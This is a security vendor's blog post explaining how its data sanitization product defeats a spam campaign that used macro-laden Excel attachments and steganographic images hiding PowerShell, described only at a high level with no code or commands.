Data Sanitization against Steganography, Evasion

We have warned about the risk of steganography in the previous blog. Steganography is the method of concealing messages, images, videos or malware within a file or a message. We have now observed steganography in actual attacks*. Just last week, Crowdstrike published their finding on Cutwail Spam Campaign in Japanese-language emails, and steganography was one of the tactics used by the hacker. In this blog, we will demonstrate the effectiveness of OPSWAT Data Sanitization against steganography and evasion tactics using this attack example.

We can split this spam campaign into four stages as follows (we will apply Data Sanitization to stages 1, 2 and 3).

Stage 1: phishing email with a Microsoft Excel attachment

Stage 2: obfuscated VBA scripts inside of a Microsoft Excel document

Stage 3: steganography image containing obfuscated PowerShell script

Stage 4: final payload

stages 1 and 2: phishing email with a Microsoft Excel attachment containing obfuscated VBA scripts inside of a Microsoft Excel document

Email is the most popular way to gain initial access to the victim's network. OPSWAT MetaDefender (https://www.opswat.com/product... ) can detect the file type based on the contents, not just based on the file extension. Let's say security policy allows Microsoft Excel documents since it is a very common file type required for business productivity. Even so, OPSWAT Data Sanitization can reconstruct a new Microsoft Excel file while stripping off the macro.. OPSWAT does not try to detect if VB script is malicious, so obfuscation would not evade this countermeasure. Below please see the Excel document which was used for this spam campaign before and after the sanitization.


Before:

After:

stage 3: Stegosploit - steganography image containing PowerShell script

Let's say, an organization can not prohibit macro usage as part of their security policy. Even in this case, OPSWAT Data Sanitization can sanitize the image in a way it does not contain the script. Therefore attacker would fail to download the final payload.

From a user view, there is no visible difference between the original and the sanitized images.

Before SanitizationAfter Sanitization

* Reference of actual attack using Steganography

https://blog.trendmicro.com/tr...

https://www.imperva.com/blog/d...

https://securityintelligence.c...

co-authored by Vinh Lam

Sign up for Blog updates

Get information and insight from the leaders in advanced threat prevention.